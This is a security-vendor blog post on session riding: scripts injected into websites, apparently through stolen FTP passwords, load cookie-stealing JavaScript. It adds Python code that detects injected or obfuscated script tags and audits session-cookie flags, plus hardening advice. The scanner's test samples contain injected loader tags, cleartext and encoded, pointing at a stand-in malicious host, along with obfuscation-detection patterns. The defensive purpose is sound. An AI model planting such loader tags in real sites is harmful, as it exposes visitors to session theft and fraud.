19/04/2012

Session riding endangers unsuspecting web surfers


The attackers injected script code into legitimate websites; the code leads unsuspecting visitors to a malicious JavaScript file hosted on an external server. This file is designed to steal session cookies so that the attacker can impersonate the real user and use the session for fraudulent actions.


The injected code
It is written either in cleartext or in an encoded and therefore obfuscated form.
[Screenshot: the injected code in cleartext]
Our scanners detect this injection as HTML:Script-inf; G Data users with active HTTP filtering are therefore alerted right away when visiting one of the infected sites.
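The two forms the post describes, cleartext and encoded, can be checked for mechanically. The following Python scanner is an added example, not G Data's detection logic: it collects the script elements of a page, flags external script sources whose host is not on an assumed allowlist (TRUSTED_SCRIPT_HOSTS, a placeholder for the site's own hosts), and flags inline scripts that carry common decode-at-run-time markers such as unescape() or eval(). The sample pages, host names and file names are constructed for the demonstration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts from which this site legitimately loads scripts (assumed allowlist).
TRUSTED_SCRIPT_HOSTS = {"www.example-shop.test", "cdn.example-shop.test"}

# Markers typical of encoded injections: the real script is decoded at run
# time and then written into the page or handed to eval().
OBFUSCATION_MARKERS = (
    r"unescape\s*\(",
    r"\beval\s*\(",
    r"String\.fromCharCode\s*\(",
    r"(?:%[0-9a-fA-F]{2}){8,}",     # long run of %XX percent-encoded bytes
    r"(?:\\x[0-9a-fA-F]{2}){8,}",   # long run of \xNN escapes
)


class ScriptCollector(HTMLParser):
    """Collects external script sources and inline script bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.external = []      # src attributes of <script src=...>
        self.inline = []        # bodies of <script>...</script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def scan_html(html, trusted_hosts=TRUSTED_SCRIPT_HOSTS):
    """Return (kind, detail) findings for scripts that look injected."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname
        # A src naming a host that is not ours loads code from an external server.
        if host and host.lower() not in trusted_hosts:
            findings.append(("external-script", src))
    for body in parser.inline:
        for pattern in OBFUSCATION_MARKERS:
            if re.search(pattern, body):
                findings.append(("obfuscated-inline", pattern))
                break
    return findings


# Constructed sample pages. The clean page loads a script from its own CDN.
CLEAN_PAGE = """<html><head>
<script src="https://cdn.example-shop.test/shop.js"></script>
</head><body><p>Welcome</p></body></html>"""

# Cleartext injection: a tag appended to the page loading a file from a
# server the site does not own (".invalid" is a reserved placeholder TLD).
CLEARTEXT_INJECTION = CLEAN_PAGE + \
    '\n<script src="http://malicious.invalid/js/stat.js"></script>'

# Encoded injection: the same tag, percent-encoded and decoded at run time.
OBFUSCATED_INJECTION = CLEAN_PAGE + (
    '\n<script>document.write(unescape("%3Cscript%20src%3D%22http%3A%2F%2F'
    'malicious.invalid%2Fjs%2Fstat.js%22%3E%3C%2Fscript%3E"));</script>'
)

if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE),
                        ("cleartext", CLEARTEXT_INJECTION),
                        ("encoded", OBFUSCATED_INJECTION)):
        print(label, scan_html(page))
```

Run over a copy of the site's HTML files, the scanner gives a quick first pass; the allowlist is what keeps it from flagging the site's own scripts, so it has to be maintained along with the site.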

The deposited JavaScript
The JavaScript has been found on several servers under several different names. If executed, the most recent version tries to gather information about the visiting user’s browser and then steals all session cookies from where the browser stores them on the computer.
The G Data scan engines detect this recent JavaScript as Trojan.JS.Iframe.BDV and JS:Iframe-FP [Trj].

What can happen?
One example: let’s imagine the attackers injected the script code mentioned above into a website with online shopping capabilities. An unsuspecting user visits the website and logs in to the shop while the linked malicious JavaScript is executed. The attackers can now steal the session cookie of the active shopping account and act as if they were the actual visitor. They could therefore order goods, etc. without the user realizing it.
Once the attackers are able to log in, they can upload anything to the hacked web server. There are manifold ways to misuse such a server: for example, they can inject redirecting scripts, or upload malware and use the server as a malware host.
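The shopping scenario above hinges on a script in the page being able to read the session cookie. A server-side mitigation the original post does not mention is the HttpOnly attribute on Set-Cookie, which browsers honour by excluding the cookie from document.cookie. The following Python audit is an added example, not code from the post: it parses Set-Cookie header values with the standard library, reports session cookies set without HttpOnly, Secure or SameSite, and models which cookies a script running in the page could still read. The cookie names, values and headers are constructed; SESSION_COOKIE_NAMES is an assumed list of names to treat as session cookies.

```python
from http.cookies import SimpleCookie

# Cookie names the audit treats as session cookies (assumed list).
SESSION_COOKIE_NAMES = {"sessionid", "phpsessid", "jsessionid", "sid"}


def audit_set_cookie(header_value, session_names=SESSION_COOKIE_NAMES):
    """Parse one Set-Cookie header value; return the protections it lacks."""
    jar = SimpleCookie()
    jar.load(header_value)
    problems = []
    for name, morsel in jar.items():
        if name.lower() not in session_names:
            continue
        # Without HttpOnly the value is exposed to document.cookie, i.e. to
        # any script the page executes, injected or not.
        if not morsel["httponly"]:
            problems.append(f"{name}: missing HttpOnly (readable via document.cookie)")
        if not morsel["secure"]:
            problems.append(f"{name}: missing Secure (sent over plain HTTP)")
        if not morsel["samesite"]:
            problems.append(f"{name}: missing SameSite")
    return problems


def script_readable_cookies(set_cookie_headers):
    """Model the browser rule: cookies set without HttpOnly are visible to page script."""
    readable = []
    for header in set_cookie_headers:
        jar = SimpleCookie()
        jar.load(header)
        for name, morsel in jar.items():
            if not morsel["httponly"]:
                readable.append(name)
    return readable


# Constructed headers: the weak form and its hardened counterpart.
WEAK_HEADER = "sessionid=c0ffee42; Path=/"
HARDENED_HEADER = "sessionid=c0ffee42; Path=/; HttpOnly; Secure; SameSite=Lax"
PREFERENCE_HEADER = "theme=dark; Path=/"   # non-session cookie, may stay readable

if __name__ == "__main__":
    for header in (WEAK_HEADER, HARDENED_HEADER):
        print(header, "->", audit_set_cookie(header) or "ok")
    print("readable with weak header:",
          script_readable_cookies([WEAK_HEADER, PREFERENCE_HEADER]))
    print("readable with hardened header:",
          script_readable_cookies([HARDENED_HEADER, PREFERENCE_HEADER]))
```

HttpOnly keeps the cookie value from leaving the browser through script; it does not stop script that runs inside the page from issuing requests the browser attaches the cookie to. Hardening the cookie therefore complements, and does not replace, removing the injection and closing the way it got in.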

How were the attackers able to inject the code in the first place?
There are many ways attackers can gain access to website management systems. Recently there have been many reports about exploited vulnerabilities in content management systems that led to code injections and dangerous situations. Remember the ticking time bomb on hacked WordPress pages?
Many of the infected pages we have seen use popular free CMS solutions like WordPress or Joomla, but many don’t. We therefore suspect that the source of the problem lies elsewhere…

From what we know so far, it seems most likely that the computers of the users managing the websites were infected with password-stealing malware, and that this malware provided the attackers with the data they needed (especially FTP passwords) to enter the websites.


The importance of securing one’s computer has been illustrated numerous times, especially because one single infected computer can, in turn, harm thousands of others: here, attackers gained access to website management systems and injected code into websites that harms the visiting users.


What can website managers do?

  • To secure your site, your website management system should be up to date at all times. Install the latest software from the developer’s website.
  • The same applies to all used plug-ins and themes for your websites.
  • In case you own the web server, ensure that it is up to date and in a secured state. If you rented web space on a remote server, get in contact with your provider to inform yourself about the issue.
  • Make sure that all passwords for all accounts (CMS, FTP, etc.) are chosen wisely. An administration account should not be named “admin”, and every account needs a unique password that is sufficiently strong. Read more about secure passwords.
  • Disable/Delete inactive accounts for your website management systems.
  • Scan and monitor all computers that have access to your website management systems with comprehensive security solutions to avoid getting infected with (password stealing) malware.